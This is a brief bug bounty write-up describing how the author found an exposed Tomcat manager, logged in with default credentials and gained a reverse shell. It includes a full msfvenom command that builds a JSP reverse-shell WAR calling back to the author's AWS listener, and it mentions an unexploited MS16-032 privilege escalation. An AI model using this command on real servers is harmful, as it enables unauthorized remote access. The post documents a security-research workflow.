From TOMCAT to NT AUTHORITY\SYSTEM

So its been some time since I've done some Bug Bounty as I was busy working .

I wont be revealing the Program due to Privacy Issues …

I started my initial recon by doing some subdomain enumeration using KNOCKPY SUBLISTER etc..

And i got a subdomain named test.REDACTED.com there was nothing much to look for it returned a simple static HTML page , Then I did a Directory Scan using Dirsearch

“/manager” that's a TOMCAT LOGIN

Checking If it used default login was much more Satisfying

Please Don’t Question my PC name

And Drum roll…………..

We have a LOGIN

Oooh Weee

Now its time to pop a shell I used my AWS server as a Listener

Generating a jsp payload can be achieved using this command

msfvenom -p java/jsp_shell_reverse_tcp LHOST=18.191.1**.* LPORT=4444 -f war > shell.war

**You can open your own custom port by adding it to the inbound rules section**

Now with the TCP handler

Server is Running Apache 7.0

On Further enumeration I found that the Server is Microsoft Windows Server 2012 which was not looked after so often that last patch was on 2016 (poor guy)

And It was vulnerable to MS16–032 and I never tried to exploit it because it may piss off some of the DEVS.